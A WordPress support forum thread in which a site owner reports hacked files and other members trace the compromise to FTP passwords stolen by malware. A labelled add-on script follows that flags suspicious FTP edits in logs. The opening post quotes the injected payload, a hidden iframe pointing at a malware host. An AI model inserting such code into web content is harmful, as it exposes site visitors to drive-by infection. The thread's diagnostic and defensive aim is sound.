My Wordpress sites keep getting hacked! :( [2.82] (12 posts)

  1. michael-toon
    Member
    Posted 3 months ago #

    Hello,

    I have wordpress installed on 2 separate servers, they keep getting hacked with the same hack. Someone is putting in a line of code in files, mainly index files. Files infected are:

    index.php
    wp-admin/index.php
    wp-admin/index-extra.php
    wp-content/index.php
    wp-content/plugins/index.php
    wp-content/theme/index.php
    wp-content/theme/theme-name/index.php (of all/any themes)

    The code is:
    <iframe src="http://x8y.ru:8080/ts/in.cgi?pepsi116" width=125 height=125 style="visibility: hidden"></iframe>

    Now, I think this is a wordpress problem because I have it installed on 2 different servers, and it's the only thing installed on one server in a few instances. ALL the sites get hacked.

    On server 1 I have WP installed with default theme and no plugins. I have tried deleting all files and re-uploading new files, which has not worked.

    Server 2 I have 3 installations of WP running, and nothing else on the server.

    Other security measures I have taken are:
    password protect the wp-admin directory
    changed the wp_ table prefix to something different (something different on each install)
    uninstalled all plugins/themes and have a completely default WP running
    changed the passwords and usernames of the Admin account (using long passwords with upper/lower case letters/numbers/special chars)
    changed the MySQL passwords

    I have had to remove the WP on server 1 because I have other things on that site and it seems to infect them once it gets to WP.

    I have been running WP since 2.7 and always upgrade it, and I have had no problems until now.

    Please help me sort this problem out. I have read about another person having this problem but there doesn't seem to be a solution. I am really sick of waking up, checking my site and having this problem and having to upload the index files each time.

  2. mrmist
    Member
    Posted 3 months ago #

    Check over http://codex.wordpress.org/FAQ_My_site_was_hacked and the sites it links to for help on cleaning up hacks. You will need to change login passwords as well as replacing files, and potentially clean out users from your database.

  3. whooami
    Member
    Posted 3 months ago #

    And how about scanning your local machine(s) for malware?

  4. michael-toon
    Member
    Posted 3 months ago #

    Thanks, but I have done all of those things, I have also informed my hosts, I have basically done everything I have read to do plus more.

    I have now removed WP from server 1 completely, so I will see if I get this problem without WP (which I doubt).

    Doesn't it seem strange to you that this has happened on different WPs on separate servers, exactly the same thing? 1 server only running WP.

  5. whooami
    Member
    Posted 3 months ago #

    Doesn't it seem strange to you..

    No it doesn't. I once cleaned out 5 sites across 3 servers all owned by the same guy.

    He had malware on one of the machines he was using.

    It's especially suspicious when only certain files are edited, i.e. only files with the string index*

    Humor me - do you have cpanel available, and are you archiving your server logs?

    --

    lastly,

    one server only running wordpress

    Is this YOUR server? Because I assure you that unless it's YOUR server, you have NO idea what's running on it, outside of your own web space.

    I'm not suggesting that that's the source of your issue, just that you see a very small picture of what's going on when you're in nearly every shared hosting environment.

  6. mrmist
    Member
    Posted 3 months ago #

    It's not really strange, as crackers and spammers just search the web for sites to exploit automatically. If both sites are at the same version, for example, there may be a hack that works on both. I also expect that lists are kept of where hacks have been used successfully, and those sites will be hit again.

    If you really have done everything in those articles then I'd do what whoami suggests and scan your local computer, in case you have an exploited program.

  7. whooami
    Member
    Posted 3 months ago #

    Malware infections, gumblar variants, are VERY easy to see in ftp logs.

    You will see multiple connections editing and replacing files .. within seconds of one another, and .. they all have different IPs.

    Those IPs .. point back to other malware infected machines.

    It's unmistakable traffic if you know what you're looking for.

    If you're not archiving those logs.. that data won't be available.

  8. michael-toon
    Member
    Posted 3 months ago #

    I have cpanel. I have checked the raw access logs, and can't find anything.

    I don't look after the servers, the hosting company does. I have asked them to do a scan, but it's a good company and I have had no problems with them in 7 years so I would imagine they do, but there we go.

    It isn't actually only those index files, I missed 2 out, it also does:

    wp-includes/default-widgets.php
    wp-includes/default-filters.php

    Also, someone else has this problem, here:
    http://wordpress.org/support/topic/293832?replies=6

  9. whooami
    Member
    Posted 3 months ago #

    Not your raw access logs.

    Access logs are web server logs.

    default* is the other common string -- (sorry, still not sold)

    and here:

    http://www.vbulletin.com/forum/showthread.php?t=311113

    Here's someone with the problem that's using vbulletin.

    You can link - so can I. :)

    Here's a drupal site:

    http://drupal.org/node/499756

  10. michael-toon
    Member
    Posted 3 months ago #

    lol ok I take your point :)

    Unfortunately one server does not have the archiving on (it does now :p ). I checked the other and saw that they accessed and modified my files in that, but how did they get access in the first place?

  11. whooami
    Member
    Posted 3 months ago #

    I checked the other and saw that they accessed and modified my files in that ...

    You checked what? Your ftp log in cpanel?

    If you don't mind, paste a bit of what you see? 2-3 lines are fine.

    If, in fact, you're seeing the activity I described .. well then, it means your ftp password is being compromised.

    In other words, you have malware on one of your machines, and you have not addressed that problem.

    Until you do, your password(s) will continue to be compromised -- no matter how many times you change it.

    http://www.google.com/#hl=en&q=get+rid+of+malware&aq=f&oq=&aqi=&fp=8nV-RSzXL1c

    2nd link: malwarebytes.org

    Here's how it works:

    You may or may not have done all your windows updates, etc.. You may be running some adobe products (which have been increasingly vulnerable to these sorts of attacks).. You might download a piece of software in a torrent.. You surf a site that is distributing malware.. It could be anything.

    You get the malware.

    It adds you to a botnet.
    It sends off your stored ftp passwords.

    Other machines, that are already in the botnet, log in to all the sites in the stolen ftp password list that was "sent off". They make changes to your files that allow the malware to be distributed using your site.

    While you remain exploited.

    For anyone that's REALLY curious, take a look at port explorer:

    http://diamondcs.com.au/portexplorer/

    It's not free for long (the trial is short), but it's an excellent tool for helping in diagnosing these sorts of things. Note that connections to unusual IPs on ports that are usually reserved for irc connections (6666, 6667, etc..) are more evidence of malware.

  12. michael-toon
    Member
    Posted 3 months ago #

    Here are some lines:

    Tue Jul 28 05:42:34 2009 0 83.82.57.39 7890 /home/blahblah/public_html/blog/wp-includes/default-filters.php a _ o r blahblah ftp 1 * c
    Tue Jul 28 05:42:42 2009 1 89.28.61.63 7794 /home/blahblah/public_html/blog/wp-includes/default-filters.php a _ i r blahblah ftp 1 * c
    Tue Jul 28 05:42:50 2009 0 212.235.74.52 37651 /home/blahblah/public_html/blog/wp-includes/default-widgets.php a _ o r blahblah ftp 1 * c
    Tue Jul 28 05:42:58 2009 1 68.46.148.41 36774 /home/blahblah/public_html/blog/wp-includes/default-widgets.php a _ i r blahblah ftp 1 * c

    I use strong passwords for my ftp accounts, needless to say I have changed them as well. I have been going through some things on the server removing them, there were some old things in the home directory (outside public_html) on 1 server which I have now removed.
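The pattern whooami describes in posts 7 and 11 (a file fetched from one IP and re-uploaded seconds later from another) is visible in the xferlog lines above: each "o" (download) is followed within 8 seconds by an "i" (upload) of the same path from a different address. The script below, an added example that is not part of the thread or of cPanel, scans an xferlog-format file for exactly that sequence; the sample lines are constructed with documentation IPs and a placeholder account name.

```python
"""Flag stolen-FTP-credential edits in xferlog-format logs: a download of a
file followed, within a short window, by an upload of the same file from a
different IP. Added example; the log below is constructed, not real data."""
from datetime import datetime, timedelta

# Constructed sample in xferlog format (fields: timestamp, transfer time,
# remote host, size, path, type, action flag, direction, access mode,
# user, service, auth method, auth uid, completion status).
SAMPLE_LOG = """\
Tue Jul 28 05:42:34 2009 0 198.51.100.7 7890 /home/site/public_html/blog/wp-includes/default-filters.php a _ o r site ftp 1 * c
Tue Jul 28 05:42:42 2009 1 203.0.113.9 7794 /home/site/public_html/blog/wp-includes/default-filters.php a _ i r site ftp 1 * c
Tue Jul 28 05:42:50 2009 0 192.0.2.44 37651 /home/site/public_html/blog/wp-includes/default-widgets.php a _ o r site ftp 1 * c
Tue Jul 28 05:42:58 2009 1 198.51.100.200 36774 /home/site/public_html/blog/wp-includes/default-widgets.php a _ i r site ftp 1 * c
Tue Jul 28 09:15:03 2009 2 192.0.2.10 40210 /home/site/public_html/blog/wp-content/themes/mine/style.css a _ o r site ftp 1 * c
Tue Jul 28 09:20:11 2009 2 192.0.2.10 40311 /home/site/public_html/blog/wp-content/themes/mine/style.css a _ i r site ftp 1 * c
"""

def parse_xferlog(text):
    """Yield (time, ip, path, direction, size) per line; skip malformed lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 18:
            continue
        when = datetime.strptime(" ".join(parts[0:5]), "%a %b %d %H:%M:%S %Y")
        ip, size, path, direction = parts[6], int(parts[7]), parts[8], parts[11]
        yield when, ip, path, direction, size

def find_hijacked_edits(text, window=timedelta(seconds=60)):
    """Return (path, download_ip, upload_ip, seconds_apart) for every upload
    that follows a download of the same path from a different IP inside the
    window. Same-IP download/upload pairs (the owner editing) are ignored."""
    last_download = {}  # path -> (time, ip) of the most recent download
    hits = []
    for when, ip, path, direction, _ in parse_xferlog(text):
        if direction == "o":
            last_download[path] = (when, ip)
        elif direction == "i" and path in last_download:
            dl_time, dl_ip = last_download[path]
            gap = when - dl_time
            if dl_ip != ip and timedelta(0) <= gap <= window:
                hits.append((path, dl_ip, ip, int(gap.total_seconds())))
    return hits

if __name__ == "__main__":
    for path, dl_ip, up_ip, secs in find_hijacked_edits(SAMPLE_LOG):
        print(f"{path}: fetched by {dl_ip}, replaced by {up_ip} {secs}s later")
```

Point it at the archived cPanel FTP log instead of SAMPLE_LOG; the theme edit from a single IP is left alone, the two wp-includes replacements are reported.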
